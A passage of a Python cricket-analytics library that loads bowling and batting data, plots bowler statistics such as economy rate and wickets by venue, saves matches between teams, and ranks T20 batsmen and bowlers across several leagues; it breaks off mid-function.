# Date : 24 Feb 2019
# Function: getBowlerWicketDetails
# This function gets the bowler wicket details
#
#
###########################################################################################
def getBowlerWicketDetails(team, name,dir="."):
'''
Description
This function gets the bowling of a bowler (overs,maidens,runs,wickets,venue, opposition)
Usage
getBowlerWicketDetails(team,name,dir=".")
Arguments
team
The team to which the bowler belongs
name
The name of the bowler
dir
The source directory of the data
Value
dataframe The dataframe of bowling performance
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
https://github.com/tvganesh/yorkrData
See Also
bowlerMovingAverage
getTeamBowlingDetails
bowlerMeanRunsConceded
teamBowlersWicketRunsOppnAllMatches
Examples
name="R Ashwin"
team='Chennai Super Kings'
df=getBowlerWicketDetails(team, name,dir=".")
'''
path = dir + '/' + team + "-BowlingDetails.csv"
bowlingDetails= pd.read_csv(path,index_col=False)
bowlerDetails = bowlingDetails.loc[bowlingDetails['bowler'].str.contains(name)]
return(bowlerDetails)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 24 Feb 2019
# Function: bowlerMeanEconomyRate
# This function gets the bowler mean economy rate
#
#
###########################################################################################
def bowlerMeanEconomyRate(df,name="A Leg Glance",plot=True, savePic=False, dir1=".",picFile="pic1.png"):
'''
Description
This function computes and plots the mean economy rate versus the number of overs bowled by the bowler
Usage
bowlerMeanEconomyRate(df, name)
Arguments
df
Data frame
name
Name of bowler
plot
If plot=TRUE then a plot is created otherwise a data frame is returned
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
bowlerMovingAverage
bowlerWicketPlot
bowlerWicketsVenue
bowlerMeanRunsConceded
Examples
name="R Ashwin"
team='Chennai Super Kings'
df=getBowlerWicketDetails(team, name,dir=".")
bowlerMeanEconomyRate(df, name)
'''
# Compute mean economy rate for each number of overs bowled
rcParams['figure.figsize'] = 8, 5
df2=df[['bowler','overs','econrate']].groupby('overs').mean().reset_index(inplace=False)
plt.xlabel('No of overs',fontsize=8)
plt.ylabel('Mean economy rate',fontsize=8)
sns.barplot(x='overs',y='econrate',data=df2)
atitle = name + "-Mean economy rate vs overs"
plt.title(atitle,fontsize=8)
if(plot==True):
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
return
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 24 Feb 2019
# Function: bowlerMeanRunsConceded
# This function gets the mean runs conceded by bowler
#
#
###########################################################################################
def bowlerMeanRunsConceded(df,name="A Leg Glance",plot=True, savePic=False, dir1=".",picFile="pic1.png"):
'''
Description
This function computes and plots the mean runs conceded by the bowler versus the number of overs bowled
Usage
bowlerMeanRunsConceded(df, name)
Arguments
df
Data frame
name
Name of bowler
plot
If plot=TRUE then a plot is created otherwise a data frame is returned
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
bowlerMovingAverage
bowlerWicketPlot
bowlerWicketsVenue
bowlerMeanRunsConceded
Examples
name="R Ashwin"
team='Chennai Super Kings'
df=getBowlerWicketDetails(team, name,dir=".")
bowlerMeanRunsConceded(df, name)
'''
# Compute mean runs conceded for each number of overs bowled
rcParams['figure.figsize'] = 8, 5
df2=df[['bowler','overs','runs']].groupby('overs').mean().reset_index(inplace=False)
plt.xlabel('No of overs',fontsize=8)
plt.ylabel('Mean runs conceded',fontsize=8)
sns.barplot(x='overs',y='runs',data=df2)
atitle = name + "-Mean runs conceded vs overs"
plt.title(atitle,fontsize=8)
if(plot==True):
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
return
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 24 Feb 2019
# Function: bowlerMovingAverage
# This function gets the bowler moving average
#
#
###########################################################################################
def bowlerMovingAverage(df, name,plot=True, savePic=False, dir1=".",picFile="pic1.png"):
'''
Description
This function computes and plots the wickets taken by the bowler over his career. A moving average (window of 30) smooths the wickets taken by the bowler
Usage
bowlerMovingAverage(df, name)
Arguments
df
Data frame
name
Name of bowler
plot
If plot=TRUE then a plot is created otherwise a data frame is returned
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
https://github.com/tvganesh/yorkrData
See Also
bowlerMeanEconomyRate
bowlerWicketPlot
bowlerWicketsVenue
bowlerMeanRunsConceded
Examples
name="R Ashwin"
team='Chennai Super Kings'
df=getBowlerWicketDetails(team, name,dir=".")
bowlerMovingAverage(df, name)
'''
rcParams['figure.figsize'] = 8, 5
y_av = movingaverage(df.wicket, 30)
date= pd.to_datetime(df['date'])
plt.plot(date, y_av,"b")
plt.xlabel('Date',fontsize=8)
plt.ylabel('Wickets',fontsize=8)
plt.xticks(rotation=70)
atitle = name + "-Moving average of wickets"
plt.title(atitle,fontsize=8)
if(plot==True):
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
return
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 24 Feb 2019
# Function: bowlerCumulativeAvgWickets
# This function gets the bowler cumulative average runs
#
#
###########################################################################################
def bowlerCumulativeAvgWickets(df,name="A Leg Glance",plot=True, savePic=False, dir1=".",picFile="pic1.png"):
'''
Description
This function computes and plots the cumulative average wickets of a bowler
Usage
bowlerCumulativeAvgWickets(df,name)
Arguments
df
Data frame
name
Name of bowler
plot
If plot=TRUE then a plot is created otherwise a data frame is returned
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
https://github.com/tvganesh/yorkrData
See Also
batsmanCumulativeAverageRuns bowlerCumulativeAvgEconRate batsmanCumulativeStrikeRate batsmanRunsVsStrikeRate batsmanRunsPredict
Examples
name="R Ashwin"
team='Chennai Super Kings'
df=getBowlerWicketDetails(team, name,dir=".")
bowlerCumulativeAvgWickets(df, name)
'''
rcParams['figure.figsize'] = 8, 5
cumAvgRuns = df['wicket'].cumsum()/pd.Series(np.arange(1, len( df['wicket'])+1), df['wicket'].index)
plt.plot(cumAvgRuns)
plt.xlabel('No of matches',fontsize=8)
plt.ylabel('Cumulative Average wickets',fontsize=8)
plt.xticks(rotation=90)
atitle = name + "-Cumulative Average wickets vs matches"
plt.title(atitle,fontsize=8)
if(plot==True):
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
return
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 24 Feb 2019
# Function: bowlerCumulativeAvgEconRate
# This function gets the bowler cumulative average economy rate
#
#
###########################################################################################
def bowlerCumulativeAvgEconRate(df,name="A Leg Glance",plot=True, savePic=False, dir1=".",picFile="pic1.png"):
'''
Description
This function computes and plots the cumulative average economy rate of a bowler
Usage
bowlerCumulativeAvgEconRate(df,name)
Arguments
df
Data frame
name
Name of bowler
plot
If plot=TRUE then a plot is created otherwise a data frame is returned
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
https://github.com/tvganesh/yorkrData
See Also
batsmanCumulativeAverageRuns bowlerCumulativeAvgWickets batsmanCumulativeStrikeRate batsmanRunsVsStrikeRate batsmanRunsPredict
Examples
name="R Ashwin"
team='Chennai Super Kings'
df=getBowlerWicketDetails(team, name,dir=".")
bowlerCumulativeAvgEconRate(df, name)
'''
rcParams['figure.figsize'] = 8, 5
cumAvgRuns = df['econrate'].cumsum()/pd.Series(np.arange(1, len( df['econrate'])+1), df['econrate'].index)
plt.plot(cumAvgRuns)
plt.xlabel('No of matches',fontsize=7)
plt.ylabel('Cumulative Average economy rate',fontsize=8)
plt.xticks(rotation=70)
atitle = name + "-Cumulative Average economy rate vs matches"
plt.title(atitle,fontsize=8)
if(plot==True):
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
return
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 24 Feb 2019
# Function: bowlerWicketPlot
# This function gets the bowler wicket plot
#
#
###########################################################################################
def bowlerWicketPlot(df,name="A Leg Glance",plot=True, savePic=False, dir1=".",picFile="pic1.png"):
'''
Description
This function computes and plots the average wickets taken by the bowler versus the number of overs bowled
Usage
bowlerWicketPlot(df, name)
Arguments
df
Data frame
name
Name of bowler
plot
If plot=TRUE then a plot is created otherwise a data frame is returned
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
https://github.com/tvganesh/yorkrData
See Also
bowlerMeanEconomyRate
bowlerWicketsVenue
bowlerMeanRunsConceded
Examples
name="R Ashwin"
team='Chennai Super Kings'
df=getBowlerWicketDetails(team, name,dir=".")
bowlerWicketPlot(df, name)
'''
rcParams['figure.figsize'] = 8, 5
# Compute mean wickets for each number of overs bowled
df2=df[['bowler','overs','wicket']].groupby('overs').mean().reset_index(inplace=False)
plt.xlabel('No of overs',fontsize=8)
plt.ylabel('Mean wickets',fontsize=8)
sns.barplot(x='overs',y='wicket',data=df2)
atitle = name + "-Mean wickets vs overs"
plt.title(atitle,fontsize=8)
if(plot==True):
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
return
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 24 Feb 2019
# Function: bowlerWicketsAgainstOpposition
# This function gets the bowler's performance against opposition
#
#
###########################################################################################
def bowlerWicketsAgainstOpposition(df,name= "A Leg Glance", plot=True, savePic=False, dir1=".",picFile="pic1.png"):
'''
Description
This function computes and plots the mean number of wickets taken by the bowler against different oppositions
Usage
bowlerWicketsAgainstOpposition(df, name)
Arguments
df
Data frame
name
Name of bowler
plot
If plot=TRUE then a plot is created otherwise a data frame is returned
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
bowlerMovingAverage
bowlerWicketPlot
bowlerWicketsVenue
bowlerMeanRunsConceded
Examples
name="R Ashwin"
team='Chennai Super Kings'
df=getBowlerWicketDetails(team, name,dir=".")
bowlerWicketsAgainstOpposition(df, name)
'''
rcParams['figure.figsize'] = 8, 5
df1 = df[['bowler', 'wicket','team2']]
df2=df1.groupby('team2').agg(['sum','mean','count'])
df2.columns= ['_'.join(col).strip() for col in df2.columns.values]
# Reset index
df3=df2.reset_index(inplace=False)
ax=sns.barplot(x='team2', y="wicket_mean", data=df3)
plt.xticks(rotation=90,fontsize=7)
plt.xlabel('Opposition',fontsize=7)
plt.ylabel('Mean wickets',fontsize=8)
atitle=name + "-Mean wickets against opposition"
plt.title(atitle,fontsize=8)
if(plot==True):
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
return
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 24 Feb 2019
# Function: bowlerWicketsVenue
# This function gets the bowler wickets at venues
#
#
###########################################################################################
def bowlerWicketsVenue(df,name= "A Leg Glance",plot=True, savePic=False, dir1=".",picFile="pic1.png"):
'''
Bowler performance at different venues
Description
This function computes and plots mean number of wickets taken by the bowler in different venues
Usage
bowlerWicketsVenue(df, name)
Arguments
df
Data frame
name
Name of bowler
plot
If plot=TRUE then a plot is created otherwise a data frame is returned
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
bowlerMovingAverage
bowlerWicketPlot
bowlerWicketsVenue
bowlerMeanRunsConceded
Examples
name="R Ashwin"
team='Chennai Super Kings'
df=getBowlerWicketDetails(team, name,dir=".")
bowlerWicketsVenue(df, name)
'''
rcParams['figure.figsize'] = 8, 5
df1 = df[['bowler', 'wicket','venue']]
df2=df1.groupby('venue').agg(['sum','mean','count'])
df2.columns= ['_'.join(col).strip() for col in df2.columns.values]
# Reset index
df3=df2.reset_index(inplace=False)
ax=sns.barplot(x='venue', y="wicket_mean", data=df3)
plt.xticks(rotation=90,fontsize=7)
plt.xlabel('Venue',fontsize=7)
plt.ylabel('Mean wickets',fontsize=8)
atitle=name + "-Mean wickets at different venues"
plt.title(atitle,fontsize=8)
if(plot==True):
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
return
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 1 March 2019
# Function: saveAllMatchesBetween2IntlT20s
# This function saves all the matches between 2 Intl T20 teams
#
###########################################################################################
def saveAllMatchesBetween2IntlT20s(dir1,odir="."):
'''
Saves all matches between 2 Intl. T20 teams as dataframes
Description
This function saves all matches between 2 Intl. T20 countries as a single dataframe in the
current directory
Usage
saveAllMatchesBetween2IntlT20s(dir1,odir=".")
Arguments
dir1
The source directory with the converted match data
odir
The output directory to store the saved matches
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.in/
See Also
teamBowlingScorecardOppnAllMatches
teamBatsmenVsBowlersOppnAllMatches
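Examples
# Illustrative usage; dir1 holds the converted match CSV files and odir is
# where the pairwise team files are written
saveAllMatchesBetween2IntlT20s(".",odir="./matches")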
'''
teams = ["Afghanistan","Australia","Bangladesh","Bermuda","Canada","England",
"Hong Kong","India","Ireland", "Kenya","Nepal","Netherlands",
"New Zealand", "Oman","Pakistan","Scotland","South Africa",
"Sri Lanka", "United Arab Emirates","West Indies", "Zimbabwe"]
for team1 in teams:
for team2 in teams:
if team1 != team2:
print("Team1=",team1,"team2=", team2)
getAllMatchesBetweenTeams(team1,team2,dir=dir1,save=True,odir=odir)
time.sleep(2) #Sleep before next save
return
###########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 2 Mar 2019
# Function: saveAllMatchesAllOppositionIntlT20
# This function saves all the matches between all Intl T20 teams
#
###########################################################################################
def saveAllMatchesAllOppositionIntlT20(dir1,odir="."):
'''
Saves matches against all Intl T20 teams as dataframe and CSV for each Intl T20 team
Description
This function saves all Intl T20 matches against all oppositions as a single
dataframe in the output directory
Usage
saveAllMatchesAllOppositionIntlT20(dir1,odir=".")
Arguments
dir1
The source directory with the converted match data
odir
The output directory to store the saved matches
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
convertYaml2PandasDataframeT20
teamBattingScorecardMatch
'''
teams = ["Afghanistan","Australia","Bangladesh","Bermuda","Canada","England",
"Hong Kong","India","Ireland", "Kenya","Nepal","Netherlands",
"New Zealand", "Oman","Pakistan","Scotland","South Africa",
"Sri Lanka", "United Arab Emirates","West Indies", "Zimbabwe"]
for team in teams:
print("Team=",team)
getAllMatchesAllOpposition(team,dir=dir1,save=True,odir=odir)
time.sleep(2) #Sleep before next save
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 2 March 2019
# Function: saveAllMatchesBetween2BBLTeams
# This function saves all the matches between 2 BBL Teams
#
###########################################################################################
def saveAllMatchesBetween2BBLTeams(dir1):
'''
Saves all matches between 2 BBL teams as dataframes
Description
This function saves all matches between 2 BBL teams as a single dataframe in the
current directory
Usage
saveAllMatchesBetween2BBLTeams(dir1)
Arguments
dir1
Directory with the converted match data
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.in/
See Also
teamBowlingScorecardOppnAllMatches
teamBatsmenVsBowlersOppnAllMatches
'''
teams = ["Adelaide Strikers", "Brisbane Heat", "Hobart Hurricanes",
"Melbourne Renegades", "Perth Scorchers", "Sydney Sixers",
"Sydney Thunder"]
for team1 in teams:
for team2 in teams:
if team1 != team2:
print("Team1=",team1,"team2=", team2)
getAllMatchesBetweenTeams(team1,team2,dir=dir1,save=True)
time.sleep(2) #Sleep before next save
return
###########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 2 Mar 2019
# Function: saveAllMatchesAllOppositionBBLT20
# This function saves all the matches between all BBL T20 teams
#
###########################################################################################
def saveAllMatchesAllOppositionBBLT20(dir1):
'''
Saves matches against all BBL T20 teams as dataframe and CSV for each BBL team
Description
This function saves all BBL T20 matches against all oppositions as a single
dataframe in the current directory
Usage
saveAllMatchesAllOppositionBBLT20(dir1)
Arguments
dir1
Directory with the converted match data
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
convertYaml2PandasDataframeT20
teamBattingScorecardMatch
'''
teams = ["Adelaide Strikers", "Brisbane Heat", "Hobart Hurricanes",
"Melbourne Renegades", "Perth Scorchers", "Sydney Sixers",
"Sydney Thunder"]
for team in teams:
print("Team=",team)
getAllMatchesAllOpposition(team,dir=dir1,save=True)
time.sleep(2) #Sleep before next save
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 2 March 2019
# Function: saveAllMatchesBetween2NWBTeams
# This function saves all the matches between 2 NWB Teams
#
###########################################################################################
def saveAllMatchesBetween2NWBTeams(dir1):
'''
Saves all matches between 2 NWB teams as dataframes
Description
This function saves all matches between 2 NWB T20 teams as a single dataframe in the
current directory
Usage
saveAllMatchesBetween2NWBTeams(dir1)
Arguments
dir1
Directory with the converted match data
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.in/
See Also
teamBowlingScorecardOppnAllMatches
teamBatsmenVsBowlersOppnAllMatches
'''
teams = ["Derbyshire", "Durham", "Essex", "Glamorgan",
"Gloucestershire", "Hampshire", "Kent","Lancashire",
"Leicestershire", "Middlesex","Northamptonshire",
"Nottinghamshire","Somerset","Surrey","Sussex","Warwickshire",
"Worcestershire","Yorkshire"]
for team1 in teams:
for team2 in teams:
if team1 != team2:
print("Team1=",team1,"team2=", team2)
getAllMatchesBetweenTeams(team1,team2,dir=dir1,save=True)
time.sleep(2) #Sleep before next save
return
###########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 2 Mar 2019
# Function: saveAllMatchesAllOppositionNWBT20
# This function saves all the matches between all NWB T20 teams
#
###########################################################################################
def saveAllMatchesAllOppositionNWBT20(dir1):
'''
Saves matches against all NWB T20 teams as dataframe and CSV for an NWB team
Description
This function saves all NWB T20 matches against all opposition as a single
dataframe in the current directory
Usage
saveAllMatchesAllOppositionNWBT20(dir)
Arguments
dir
Directory to store saved matches
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
convertYaml2PandasDataframeT20
teamBattingScorecardMatch
'''
teams = ["Derbyshire", "Durham", "Essex", "Glamorgan",
"Gloucestershire", "Hampshire", "Kent","Lancashire",
"Leicestershire", "Middlesex","Northamptonshire",
"Nottinghamshire","Somerset","Surrey","Sussex","Warwickshire",
"Worcestershire","Yorkshire"]
for team in teams:
print("Team=",team)
getAllMatchesAllOpposition(team,dir=dir1,save=True)
time.sleep(2) #Sleep before next save
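# Example (a sketch; mirrors the BBL helpers above -- assumes dir1 points at the
# converted NatWest T20 Blast match files):
#   saveAllMatchesAllOppositionNWBT20("./nwbMatches")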
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 28 Feb 2020
# Function: rankIntlT20Batting
# This function ranks Intl T20 batsman
#
###########################################################################################
def rankIntlT20Batting(dir1):
countries ={"India":"india", "United States of America":"usa", "Canada":"canada", "United Arab Emirates":"uae",
"Afghanistan":"afghanistan", "West Indies":"westindies","Oman":"oman","Germany":"germany",
"Namibia":"namibia","Sri Lanka":"sl","Singapore":"singapore",
"Malaysia":"malaysia","South Africa": "sa","Netherlands":"netherlands",
"Zimbabwe":"zimbabwe","Pakistan":"pakistan","Scotland":"scotland","Kuwait":"kuwait",
"New Zealand":"nz","Vanuatu":"vanuatu","Papua New Guinea": "png","Australia":"aus",
"Ireland":"ireland","England":"england","South Korea":"sk","Japan":"japan","Bangladesh":"bangladesh",
"Nepal":"nepal","Cayman Island":"cayman","Rwanda":"rwanda","Qatar":"qatar","Botswana":"botswana",
"Uganda":"uganda","Maldives":"maldives","Fiji":"fiji","Mozambique":"mozam",
"Hong Kong":"hk","Denmark":"denmark","Norway":"norway"
}
df=pd.DataFrame()
for key in countries:
val = countries[key] + "_details"
val= getTeamBattingDetails(key,dir=dir1, save=False,odir=".")
df = pd.concat([df,val])
df1=df.groupby('batsman').agg(['count','mean'])
df1.columns = ['_'.join(col).strip() for col in df1.columns.values]
df2 =df1[['runs_count','runs_mean','SR_mean']]
df3=df2[df2['runs_count']>40]
df4=df3.sort_values(['runs_mean','SR_mean'],ascending=False)
df4.columns=['matches','runs_mean','SR_mean']
return(df4)
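# Example (a sketch; assumes dir1 points at a directory of converted Intl T20 match CSVs):
#   df = rankIntlT20Batting("./t20Matches")
#   print(df.head(10))  # top batsmen by mean runs, tie-broken by mean strike rate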
#########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 28 Feb 2020
# Function: rankIntlT20Bowling
# This function ranks Intl T20 bowlers
#
###########################################################################################
def rankIntlT20Bowling(dir1):
countries ={"India":"india", "United States of America":"usa", "Canada":"canada", "United Arab Emirates":"uae",
"Afghanistan":"afghanistan", "West Indies":"westindies","Oman":"oman","Germany":"germany",
"Namibia":"namibia","Sri Lanka":"sl","Singapore":"singapore",
"Malaysia":"malaysia","South Africa": "sa","Netherlands":"netherlands",
"Zimbabwe":"zimbabwe","Pakistan":"pakistan","Scotland":"scotland","Kuwait":"kuwait",
"New Zealand":"nz","Vanuatu":"vanuatu","Papua New Guinea": "png","Australia":"aus",
"Ireland":"ireland","England":"england","South Korea":"sk","Japan":"japan","Bangladesh":"bangladesh",
"Nepal":"nepal","Cayman Island":"cayman","Rwanda":"rwanda","Qatar":"qatar","Botswana":"botswana",
"Uganda":"uganda","Maldives":"maldives","Fiji":"fiji","Mozambique":"mozam",
"Hong Kong":"hk","Denmark":"denmark","Norway":"norway"
}
df=pd.DataFrame()
for key in countries:
val = countries[key] + "_details"
val= getTeamBowlingDetails(key,dir=dir1, save=False,odir=".")
df = pd.concat([df,val])
df1=df.groupby('bowler').agg(['count','mean'])
df1.columns = ['_'.join(col).strip() for col in df1.columns.values]
df2 =df1[['wicket_count','wicket_mean','econrate_mean']]
df3=df2[df2['wicket_count']>40]
df4=df3.sort_values(['wicket_mean','econrate_mean'],ascending=False)
df4.columns=['matches','wicket_mean','econrate_mean']
return(df4)
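# Note: wicket_mean and econrate_mean are both sorted descending above; if a lower
# economy rate should break ties in a bowler's favour, ascending=[False, True] may be intended.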
#########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 28 Feb 2020
# Function: rankIPLT20Batting
# This function ranks IPL T20 batsmen
#
###########################################################################################
def rankIPLT20Batting(dir1):
iplTeams ={"Chennai Super Kings":"csk","Deccan Chargers":"dc","Delhi Daredevils":"dd",
"Kings XI Punjab":"kxip", 'Kochi Tuskers Kerala':"kct","Kolkata Knight Riders":"kkr",
"Mumbai Indians":"mi", "Pune Warriors":"pw","Rajasthan Royals":"rr",
"Royal Challengers Bangalore":"rps","Sunrisers Hyderabad":"sh","Gujarat Lions":"gl",
"Rising Pune Supergiants":"rps"}
df=pd.DataFrame()
for key in iplTeams:
val = iplTeams[key] + "_details"
val= getTeamBattingDetails(key,dir=dir1, save=False,odir=".")
df = pd.concat([df,val])
df1=df.groupby('batsman').agg(['count','mean'])
df1.columns = ['_'.join(col).strip() for col in df1.columns.values]
df2 =df1[['runs_count','runs_mean','SR_mean']]
df3=df2[df2['runs_count']>40]
df4=df3.sort_values(['runs_mean','SR_mean'],ascending=False)
df4.columns=['matches','runs_mean','SR_mean']
return(df4)
#########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 28 Feb 2020
# Function: rankIPLT20Bowling
# This function ranks IPL T20 bowlers
#
###########################################################################################
def rankIPLT20Bowling(dir1):
iplTeams ={"Chennai Super Kings":"csk","Deccan Chargers":"dc","Delhi Daredevils":"dd",
"Kings XI Punjab":"kxip", 'Kochi Tuskers Kerala':"kct","Kolkata Knight Riders":"kkr",
"Mumbai Indians":"mi", "Pune Warriors":"pw","Rajasthan Royals":"rr",
"Royal Challengers Bangalore":"rps","Sunrisers Hyderabad":"sh","Gujarat Lions":"gl",
"Rising Pune Supergiants":"rps"}
df=pd.DataFrame()
for key in iplTeams:
val = iplTeams[key] + "_details"
val= getTeamBowlingDetails(key,dir=dir1, save=False,odir=".")
df = pd.concat([df,val])
df1=df.groupby('bowler').agg(['count','mean'])
df1.columns = ['_'.join(col).strip() for col in df1.columns.values]
df2 =df1[['wicket_count','wicket_mean','econrate_mean']]
df3=df2[df2['wicket_count']>40]
df4=df3.sort_values(['wicket_mean','econrate_mean'],ascending=False)
df4.columns=['matches','wicket_mean','econrate_mean']
return(df4)
#########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 28 Feb 2020
# Function: rankNTBT20Batting
# This function ranks NTB T20 batsmen
#
###########################################################################################
def rankNTBT20Batting(dir1):
ntbTeams = {"Derbyshire":"der", "Durham":"dur", "Essex":"ess", "Glamorgan":"gla",
"Gloucestershire":"glo", "Hampshire":"ham", "Kent":"ken","Lancashire":"lan",
"Leicestershire":"lei", "Middlesex":"mid","Northamptonshire":"nor",
"Nottinghamshire":"not","Somerset":"som","Surrey":"sur","Sussex":"sus","Warwickshire":"war",
"Worcestershire":"wor","Yorkshire":"yor"}
df=pd.DataFrame()
for key in ntbTeams:
val = ntbTeams[key] + "_details"
val= getTeamBattingDetails(key,dir=dir1, save=False,odir=".")
df = pd.concat([df,val])
df1=df.groupby('batsman').agg(['count','mean'])
df1.columns = ['_'.join(col).strip() for col in df1.columns.values]
df2 =df1[['runs_count','runs_mean','SR_mean']]
df3=df2[df2['runs_count']>10]
df4=df3.sort_values(['runs_mean','SR_mean'],ascending=False)
df4.columns=['matches','runs_mean','SR_mean']
return(df4)
#########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 28 Feb 2020
# Function: rankNTBT20Bowling
# This function ranks NTB T20 bowlers
#
###########################################################################################
def rankNTBT20Bowling(dir1):
ntbTeams = {"Derbyshire":"der", "Durham":"dur", "Essex":"ess", "Glamorgan":"gla",
"Gloucestershire":"glo", "Hampshire":"ham", "Kent":"ken","Lancashire":"lan",
"Leicestershire":"lei", "Middlesex":"mid","Northamptonshire":"nor",
"Nottinghamshire":"not","Somerset":"som","Surrey":"sur","Sussex":"sus","Warwickshire":"war",
"Worcestershire":"wor","Yorkshire":"yor"}
df=pd.DataFrame()
for key in ntbTeams:
val = ntbTeams[key] + "_details"
val= getTeamBowlingDetails(key,dir=dir1, save=False,odir=".")
df = pd.concat([df,val])
df1=df.groupby('bowler').agg(['count','mean'])
df1.columns = ['_'.join(col).strip() for col in df1.columns.values]
df2 =df1[['wicket_count','wicket_mean','econrate_mean']]
df3=df2[df2['wicket_count']>10]
df4=df3.sort_values(['wicket_mean','econrate_mean'],ascending=False)
df4.columns=['matches','wicket_mean','econrate_mean']
return(df4)
#########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 28 Feb 2020
# Function: rankBBLT20Batting
# This function ranks BBL T20 batsmen
#
###########################################################################################
def rankBBLT20Batting(dir1):
bbTteams = {"Adelaide Strikers":"as", "Brisbane Heat":"bh", "Hobart Hurricanes":"hh",
"Melbourne Renegades":"mr", "Perth Scorchers":"ps", "Sydney Sixers":"ss",
"Sydney Thunder":"st"}
df=pd.DataFrame()
for key in bbTteams:
val = bbTteams[key] + "_details"
val= getTeamBattingDetails(key,dir=dir1, save=False,odir=".")
df = pd.concat([df,val])
df1=df.groupby('batsman').agg(['count','mean'])
df1.columns = ['_'.join(col).strip() for col in df1.columns.values]
df2 =df1[['runs_count','runs_mean','SR_mean']]
df3=df2[df2['runs_count']>20]
df4=df3.sort_values(['runs_mean','SR_mean'],ascending=False)
df4.columns=['matches','runs_mean','SR_mean']
return(df4)
#########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 28 Feb 2020
# Function: rankBBLT20Bowling
# This function ranks BBL T20 bowlers
#
###########################################################################################
def rankBBLT20Bowling(dir1):
bbTteams = {"Adelaide Strikers":"as", "Brisbane Heat":"bh", "Hobart Hurricanes":"hh",
